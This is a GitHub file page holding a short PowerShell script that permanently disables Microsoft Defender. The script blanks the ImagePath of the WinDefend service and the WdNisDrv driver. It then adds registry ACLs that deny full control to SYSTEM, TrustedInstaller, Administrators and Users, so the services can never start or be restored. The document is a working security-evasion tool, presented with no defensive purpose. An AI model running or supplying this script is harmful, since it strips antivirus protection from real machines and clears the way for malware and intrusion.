-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbreak service.txt
37 lines (25 loc) · 1.11 KB
/
break service.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#break the service so that it can never start
$registryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$key = Get-Item -Path $registryPath
$users = @("TrustedInstaller", "ALL APPLICATION PACKAGES", "CREATOR OWNER", "SYSTEM", "Administrators", "Users")
foreach ($user in $users) {
$acl = Get-Acl -Path $registryPath
$rule = New-Object System.Security.AccessControl.RegistryAccessRule($user, "FullControl", "Deny")
$acl.AddAccessRule($rule)
Set-Acl -Path $registryPath -AclObject $acl
}
#break the service so that it can never start
$RegistryPath = "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisDrv"
$Acl = Get-Acl -Path $RegistryPath
Set-ItemProperty -Path $RegistryPath -Name ImagePath -Value null
$Rule = New-Object System.Security.AccessControl.RegistryAccessRule(
"TrustedInstaller,ALL APPLICATION PACKAGES,CREATOR OWNER,SYSTEM,Administrators,Users",
"FullControl",
"Deny",
"None",
"None",
"None"
)
$Acl.AddAccessRule($Rule)
Set-Acl -Path $RegistryPath -AclObject $Acl